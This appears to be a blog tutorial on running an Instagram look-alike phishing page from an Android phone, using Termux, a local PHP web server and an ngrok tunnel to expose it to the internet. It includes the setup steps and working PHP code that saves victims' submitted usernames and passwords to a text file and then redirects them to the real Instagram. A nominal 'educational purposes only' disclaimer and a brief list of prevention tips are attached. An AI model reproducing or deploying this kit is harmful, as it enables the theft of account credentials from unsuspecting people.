Phishing Attack with Ngrok using Termux & Android Mobile

Phishing attack is a kind of social engineering often used to steal user data, including login credentials. It happens once an assaulter, masquerading as a trusty entity, dupes a victim into gap an email, instant message, or text message. 

The recipient is then tricked into clicking a malicious link, which might cause the installation of malware and reveal their sensitive data.


So today's post will be about a phishing attack. Before getting started I hope you guys installed ngrok in your termux application because it plays a crucial role in this topic.

NOTE: This post is for educational purposes only. Do not try to misuse this. All the tests I have done on my phone.

Requirements:

1. Termux application in Android phone
2. Kick Web Server
3. Ngrok

Getting Started:


Firstly you have to make a web server in which you can store your PHP, HTML and CSS files. To do this I am using Kick web server application for android. It has built-in PHP-Myadmin. Everything is preconfigured and it is easy to install.

There is a folder in internal storage named htdocs. Yes!! htdocs is the folder in which you have to keep your PHP and HTML files.



Step 1: Turn on the Kick Web server.

Step 2:  See the below image. Click on the icon button where the arrow is pointed and check the localhost is working properly.




Step 3:  When the localhost is running properly Open the Termux Application.

Step 4: Type ./ngrok HTTP 8080 and you will get this screen like this. Basically, Ngrok will create a secure tunnel between two parties.


Step 5: Now open the link on your browser. The link is provided by the Ngrok. Copy that link and paste it into your browser.

After completing these 5 steps you have your own web server in which you can store your files in htdocs folder. Even you can access those files through the internet using ngrok link. Now the final part is how you can make a page so that victim click on that particular link and reach your page.

Login.php

<?php

file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();

?>

Index.php

<?php

header('Location: login.html');
exit();

?>

Here I have made an Instagram look-alike phishing page. You can download two files. Click here to download.

When you enter the username and password it will redirect to the Instagram login page but it stores the username and password in usernames.txt file. As you can see before redirecting to the Instagram page it stores the values in the text file.




6 ways to prevent from Phishing Attack:


  • Use anti-malware software and keep them (along with system patches) up to date.
  • Use multi-factor authentication.
  • Never Enter Sensitive Information in a Pop Up Window or any unauthorized websites.
  • Check the Source of Information From Incoming Mail.
  • Never Go to Your Bank’s Website by Clicking on Links Included in Emails.
  • Never Click on Hyperlinks in Email or any other social media platform.

Subscribe my Newsfeed to get the latest post updates.

Post a Comment

0 Comments